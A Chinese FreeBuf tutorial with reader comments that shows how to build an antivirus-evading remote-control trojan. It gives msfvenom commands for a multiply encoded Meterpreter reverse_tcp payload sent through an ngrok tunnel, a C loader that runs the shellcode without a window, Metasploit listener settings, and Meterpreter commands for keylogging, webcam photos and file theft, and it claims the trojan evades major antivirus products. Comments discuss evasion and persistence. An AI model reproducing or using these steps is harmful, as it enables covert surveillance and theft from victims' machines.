木马免杀

木马免杀
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
Metasploit实验：制作免杀payload+对任意“外网”主机的远控 haya2017-06-14金币奖励+20共1485980人围观 ，发现 48 个不明物体 工具系统安全
*本文只做技术交流之用，技术无罪，希望大家知法懂法，更要守法

我发一个文件，你电脑就被我控制了，我可以拍照摄像下载文件，杀毒软件也不管用！这是怎么做到的呢？

这个问题的实现需要拆分成下面三个模块

内网穿透到外网

制作免杀木马后门

Metasploit控制客户机

环境准备
操作系统 用途 IP地址 需要软件
Kali 制作payload，攻击，映射端口 192.168.1.130 Metasploit Ngrok
Win7 制作payload 省略 VC++6.0
Win10 客户机 任意公网地址 无
内网穿透到外网
首先我们需要下载一个用于内网穿透的工具来进行端口映射与转发。

这里我用的是linux64bit

https://www.ngrok.cc/#down-client
接下来在上面的网站自行注册申请，然后登陆。

14967728798321.jpg!small

然后申请免费隧道，选择TCP协议，自定义远程端口，本地IP地址就是kali的IP地址，端口自定义，但不要冲突。

14967730331573.jpg!small

这里请记住隧道id，以及自定义远程端口，kali本机端口

将下载的客户端放置于指定目录，cd到目录，在命令行运行ngrok

./sunny clientid 隧道id
14967729342997.jpg!small

这样就完成了端口映射，它能将外网端口接收到的数据返回到本机kali的指定端口。内网穿透的用途很多，下面给出说明，这里不再赘述。

https://ngrok.com/docs
制作免杀木马后门
首先，在kali中用msfvenom生成一个payload

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’lhost=server.ngrok.cc lport=11206 -f c
上面命令中，-p选择指定payload，–e选择制定编码器（不同编码器免杀效果也有不同，部分编码器应对火绒等杀软效果显著）， -i 编码次数，-b 去多余/坏字符，lhost是你申请的ngrok服务器地址 lport是自定义的远程端口，-f 生成指定格式。

我这里选择生成基于C语言的数组，当然你也可以用以下命令直接得到exe木马，但这样免杀效果会打折扣，经笔者测试多次，重复编码12次后免杀效果非常强大！

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’lhost=server.ngrok.cc lport=11206 -f exe > haya.exe
然后复制buf数组

12321.jpg

在win7下用VC6.0对下面代码进行编译，得到木马。

#include
#pragmacomment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//运行时不显示窗口
unsignedchar buf[] =
"buf数组";//将复制的数组粘贴到此处
main()
{
((void(*)(void))&buf)();
}

14967730952750.jpg!small

Metasploit控制客户机
切到Kali，使用Metasploit进行监听。

14967731063808.jpg!small

设置监听攻击模块，监听载荷，IP（kali本机），端口（ngrok里自定义的本地端口），然后exp。

use exploit/multi/handler
set payloadswindows/meterpreter/reverset_tcp
set lhost 192.168.1.130
set lport 12345
exploit
14967731123333.jpg!small

当客户机执行木马后，得到一个meterpreter，可以进行的操作你懂的哈哈。

14967731174746.jpg!small

list一些meterpreter的常用命令。

Download（upload） path 下载（上传）指定目录文件
ps 列出当前系统进程
Kill uid 消灭指定uid系统进程
keyscan_start 开始键盘记录软件
webcam_snap 拍照
截屏 screenshot
关于隐藏木马，加陌生壳，自启动，文件包含，进程转移等各种姿势加强木马强度就需要大家自行测试了

通入上述步骤得到的木马经过笔者测试可以通过360，腾讯管家，Windows defender，小红伞等杀毒软件的查杀。动态免杀中，对于360，如果exe没有放在C盘或者U盘运行就可以做到动态免杀，仅仅会在拍照等特敏感操作会有提示，其他操作全程不报毒，defender和腾讯管家就更弱了，拍照也不会有任何提示。

1496773173158.jpg!small14967731803163.jpg!small

后记：通过此次实验，更加了解了信息安全的重要性。免杀和杀软是永远的对头，但是两者相互抗衡其实加速了安全行业的发展，没有绝对安全的系统，攻防相互对立却又彼此依存，攻防应合一。

文章参考：

http://blog.csdn.net/lzhd24/article/details/50664342

http://www.freebuf.com/sectool/118714.html

http://www.hackdig.com/?03/hack-2030.htm

*本文作者：haya，转载请注明FreeBuf.COM

haya
haya
2 篇文章
等级： 2级
||
上一篇：Mac OS下的wifi自动破解工具xwifi下一篇：Linux sudo漏洞（CVE-2017-1000367）复现和利用思路分析
这些评论亮了

Ttstcy (2级)aaaaa-mmmmmm回复
试了一下，并不免杀
)51(亮了

秋依 回复
这个是静态免杀，杀毒软件主动查杀不到，但是当运行时连接msf时 其会被360等监控到，无法动态免杀，想请教下您是怎样动态免杀的。。。急用。
)45(亮了

aa 回复
不出意外的话，明天360就能杀了
)29(亮了

YAIBA (1级)回复
meterpreter这玩意居然还能免杀
利用这种类似花生壳的工具确实要比端口转发+vps的时候方便的多，学到了
)6(亮了

360安全卫士 回复
你会用火绒？？？
)6(亮了
发表评论已有 48 条评论

D14tr0y (4级) 2017-06-14回复 1楼
前排受教了

亮了(4)

YAIBA (1级) 2017-06-14回复 2楼
meterpreter这玩意居然还能免杀

利用这种类似花生壳的工具确实要比端口转发+vps的时候方便的多，学到了

亮了(6)

haya (2级) 2017-06-15回复
@ YAIBA 端口+vps确实试 麻烦 而且。。。那个你懂的

亮了(2)

等风mmmm (1级) 2018-02-10回复
@ haya 大佬 请问有 端口+vps 的教程吗 249842254@qq.com 我的邮箱,感谢!

亮了(1)

bi3g0 (2级) 这家伙太懒了，还未填写个人描述！ 2017-06-14回复 3楼
请问 在win7下用VC6.0对下面代码进行编译，得到木马。 这一步是什么作用，只是为了为了不显示窗口吗

亮了(3)

lavinci 2017-06-14回复
@ bi3g0 那串字符只是指令，要编译程软件，让程序从那串指令执行

亮了(2)

haya (2级) 2017-06-15回复
@ lavinci 执行数组中的代码

亮了(2)

Ttstcy (2级) aaaaa-mmmmmm 2017-06-14回复 4楼
试了一下，并不免杀

亮了(51)

Green_m 专栏作者(4级) green-m.github.io 2017-06-14回复
@ Ttstcy 建议多阅读一些相关资料，不免杀可能只是你姿势不对。

亮了(2)

haya (2级) 2017-06-15回复
@ Ttstcy 注意下放置的盘符

亮了(2)

wyldlmu (3级) 2017-06-14回复 5楼
活到老学到老

亮了(3)

taylorwin (6级) 2017-06-14回复 6楼
https://ngrok.com/ 分分钟看到你的流量了

亮了(3)

haya (2级) 2017-06-15回复
@ taylorwin 萌新瑟瑟发抖

亮了(2)

阿花花花 (2级) 2017-06-15回复
@ taylorwin 这是什么？大婊哥

亮了(2)

almama 2017-11-22回复
@ 阿花花花 你的一切行动被掌握在ngrok公司手中

亮了(3)

我的gtr弹射起步 (1级) 2017-06-14回复 7楼
鼓励

亮了(2)

Error 2017-06-14回复 8楼
Have Something Worng!!!

No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86 from the payload

Found 1 compatible encoders

Attempting to encode payload with 12 iterations of x86/shikata_ga_nai

x86/shikata_ga_nai failed with A valid opcode permutation could not be found.

Error: An encoding exception occurred.

亮了(3)

5431 (3级) 所有的笑容都给了面前的屏幕 2017-06-14回复 9楼
烦烦烦，免杀是免杀，migrate 迁移进程就被系统拦截，求解决方法，怎样提到system @haya

亮了(2)

haya (2级) 2017-06-15回复
@ 5431 私聊交流

亮了(2)

360安全卫士 2017-06-14回复 10楼
你会用火绒？？？

亮了(6)

fatbuf 2017-06-14回复 11楼
没法持久化，重启后就啥都没了

亮了(3)

aa 2017-06-14回复 12楼
不出意外的话，明天360就能杀了

亮了(29)

haya (2级) 2017-06-15回复
@ aa 没毛病

亮了(2)

Harc (1级) 这家伙太懒了，还未填写个人描述！ 2017-06-14回复 13楼
可是我编译都编译不了啊

亮了(2)

秋依 2017-06-14回复 14楼
这个是静态免杀，杀毒软件主动查杀不到，但是当运行时连接msf时 其会被360等监控到，无法动态免杀，想请教下您是怎样动态免杀的。。。急用。

亮了(45)

haya (2级) 2017-06-15回复
@ 秋依 我现在就是动态，步骤我都公布了的呢

亮了(2)

ArthurKiller (7级) 窃.格瓦拉驻FreeBuf办事处 2017-06-15回复 15楼
WTF？一个msfveno编译多次就叫免杀？绕过行为查杀才是王道。

亮了(2)

haya (2级) 2017-06-15回复
@ ArthurKiller 往往最简单的最有用 其他动态常驻各种姿势各位大佬自己研究哈哈哈

亮了(2)

haya (2级) 2017-06-15回复
@ ArthurKiller 绕过行为powershell 目前只有这个思路

亮了(2)

Admin_C (1级) 2017-06-15回复 16楼
挺不错的，

亮了(2)

Admin_C (1级) 2017-06-15回复 17楼
必要时我觉得可以用veil呀

亮了(2)

haya (2级) 2017-06-15回复
@ Admin_C veli更容易被杀

亮了(2)

haya (2级) 2017-06-15回复 18楼
@ Ttstcy 免不了和安全软件 木马放置盘符也有关

亮了(2)

haya (2级) 2017-06-15回复
@ haya 刚刚测试了下，仍然可以免杀

亮了(2)

阿花花花 (2级) 2017-06-15回复 19楼
@ Ttstcy 本来免杀的，他嘚嘚瑟瑟发出来，被360发现，，，第二天就不免杀了！！！

亮了(2)

haya (2级) 2017-06-15回复
@ 阿花花花 免杀只是思路，跟着思路走，又不是让你一步一步做 你这样只能是个脚本小子

亮了(4)

new_Eric (1级) 2017-06-15回复 20楼
你们VC编译能过吗？一直在报错，编译过不了

亮了(3)

new_Eric (1级) 2017-06-15回复 21楼
@haya 我用vc怎么编译了不能运行

亮了(2)

艾登——皮尔斯 (5级) 2017-06-18回复 22楼

是下载到kali里面运行吗？？？

亮了(2)

艾登——皮尔斯 (5级) 2017-06-18回复 23楼

是下载到kali运行那个端口映射吗！！！！！！！

亮了(2)

haya (2级) 2017-06-19回复
@ 艾登——皮尔斯 可以下载linux.版本的ngrok

亮了(2)

11111 2017-06-21回复 24楼
模块只有x86？没有x64?

亮了(3)

haya (2级) 2017-06-22回复
@ 11111 X64向下兼容X86

亮了(2)

trackhole 2017-07-05回复 25楼
远程端口那里表示端口已被使用，无论什么数字的端口都一样。是因为我没开放端口吗？要怎么做呢？

亮了(1)

xxxx 2017-08-04回复 26楼
技术点在哪里。。。还不如之前逆向meterpreter自己写个loader的那个。

亮了(1)

AkinBnit (1级) 2017-10-19回复 27楼
免杀这么简单就 好啦。以前做免杀都是数据库全部更新，断网才开始做 马！

亮了(1)

等风mmmm (1级) 2018-02-22回复 28楼
各位表哥 lhost 这里应该怎么填 我想使用ngrok转发

亮了(1)

Mr极目楚天舒 (3级) 2018-03-09回复 29楼
我觉得提交hash到virustotal检测比较靠谱

亮了(2)
昵称
请输入昵称
必须您当前尚未登录。登陆？注册邮箱
请输入邮箱地址
必须（保密）表情插图
有人回复时邮件通知我
haya
haya

这家伙太懒，还未填写个人描述！

2
文章数
20
评论数
最近文章
Docker从入门到放弃
2018.08.15

Metasploit实验：制作免杀payload+对任意“外网”主机的远控
2017.06.14

浏览更多
相关阅读
OSX Mavericks系统安装Metasploit教程玩转Metasploit系列（第二集）技术分享：如何在Docker容器中运行Metasploit？[更新]Metasploit 4.4版本发布如何利用Metasploit制造一个键盘窃听网站
特别推荐

关注我们 分享每日精选文章

活动预告
11月

FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月

【16课时-连载中】挖掘CVE不是梦（系列课程2）
已结束
10月

【首节课仅需1元】挖掘CVE不是梦
已结束
9月

【已结束】自炼神兵之自动化批量刷SRC
已结束
FREEBUF免责声明协议条款关于我们加入我们广告及服务寻求报道广告合作联系我们友情链接关注我们
官方微信
新浪微博腾讯微博Twitter赞助商
Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
css.php 正在加载中...0daybank